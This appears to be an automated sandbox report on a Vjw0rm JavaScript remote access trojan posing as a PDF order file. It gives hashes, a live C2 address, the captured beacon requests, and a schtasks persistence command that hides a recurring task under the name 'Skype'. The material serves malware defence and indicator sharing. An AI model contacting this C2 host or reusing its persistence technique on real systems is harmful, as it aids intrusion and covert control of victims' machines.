Analysis

  • max time kernel
    134s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    23/10/2023, 14:33 UTC

General

  • Target

    23102023_2233_Order_1000213789.PDF.js

  • Size

    24KB

  • MD5

    1b5fde2efe79bc0ec4d22a1d91760165

  • SHA1

    00aa16c286726482769c0ae381ca0a6f5a4a5209

  • SHA256

    e991bba3a39d36461d64ed184bead6cb4eba71c1d0091d20d304cb80ab7e5ae5

  • SHA512

    17db34f6848ce5f9be41389b6694fa156badb31c6b7e90840c87a9f32b4f7f9394adea664b8de41185458c2098dd6771ab481cc3313167919943f64f37d960ca

  • SSDEEP

    384:z3YzEX81ndQeyn3mp0QEXvuJSWK7Zv73IMZKrnM52Q0zBtQ3ogtOhHKTAKDS:DYzEXkda3mtEWJXKNTICKPsntyKTJu

Malware Config

Extracted

Family

vjw0rm

C2

http://severdops.ddns.net:5050

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\23102023_2233_Order_1000213789.PDF.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\23102023_2233_Order_1000213789.PDF.js
      2⤵
      • Creates scheduled task(s)
      PID:2864

Network

  • flag-us
    DNS
    severdops.ddns.net
    wscript.exe
    Remote address:
    8.8.8.8:53
    Request
    severdops.ddns.net
    IN A
    Response
    severdops.ddns.net
    IN A
    95.214.27.31
  • flag-us
    POST
    http://severdops.ddns.net:5050/Vre
    wscript.exe
    Remote address:
    95.214.27.31:5050
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    User-Agent: STW_48E58919\URUOZWGF\Admin\Microsoft Windows 7 Ultimate \undefined\\YES\FALSE\
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: severdops.ddns.net:5050
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Mon, 23 Oct 2023 14:35:55 GMT
  • flag-us
    POST
    http://severdops.ddns.net:5050/Vre
    wscript.exe
    Remote address:
    95.214.27.31:5050
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    User-Agent: STW_48E58919\URUOZWGF\Admin\Microsoft Windows 7 Ultimate \undefined\\YES\FALSE\
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: severdops.ddns.net:5050
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
  • 95.214.27.31:5050
    http://severdops.ddns.net:5050/Vre
    http
    wscript.exe
    820 B
    292 B
    5
    4

    HTTP Request

    POST http://severdops.ddns.net:5050/Vre

    HTTP Response

    200

    HTTP Request

    POST http://severdops.ddns.net:5050/Vre
  • 8.8.8.8:53
    severdops.ddns.net
    dns
    wscript.exe
    64 B
    80 B
    1
    1

    DNS Request

    severdops.ddns.net

    DNS Response

    95.214.27.31

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.